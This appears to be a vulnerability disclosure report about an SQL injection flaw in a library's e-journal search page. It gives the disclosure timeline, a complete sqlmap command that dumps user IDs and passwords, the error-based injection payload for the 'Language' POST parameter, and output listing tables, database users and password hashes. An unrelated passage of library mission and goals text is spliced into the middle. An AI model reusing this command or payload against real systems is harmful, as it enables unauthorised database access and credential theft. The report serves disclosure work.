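2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-02: Vendor confirmed; details disclosed to the vendor only
2015-12-12: Details disclosed to core white hats and experts in related fields
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-05: Vendor has fixed the vulnerability and proactively disclosed it; details disclosed to the public
I. Vision: Guided by the ideal of cultivating "立型" talent, provide professional library services and create a learning environment in which the colleges are integrated and grow together.
II. Goals:
1. Space: create high-quality spaces
2. Collections: build complete resources
3. Professionalism: advance professional knowledge and skills
4. Management: improve management effectiveness
5. Digital: strengthen digital content
6. Service: provide refined services
URL: http://**.**.**.**/database/search/ejournal/JournalList_user.asp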
$ python sqlmap.py -u "http://**.**.**.**/database/search/ejournal/JournalList_user.asp" -p Language --technique=BE --form --random-agent --batch -D EDB -T Main -C ID,Password --dump
Database: master
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sys.messages    | 98318   |
| sys.sysmessages | 98318   |

Database: msdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.backupfile | 13660   |
---
Parameter: Language (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'edbsa1'
current user is DBA: False
database management system users [2]:
[*] edbsa1
[*] sa
database management system users password hashes:
[*] edbsa1 [1]:
    password hash: NULL
[*] sa [1]:
    password hash: NULL
Deploy a WAF.
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-12-02 15:56
Thank you for the report.
2016-01-05: Fix confirmed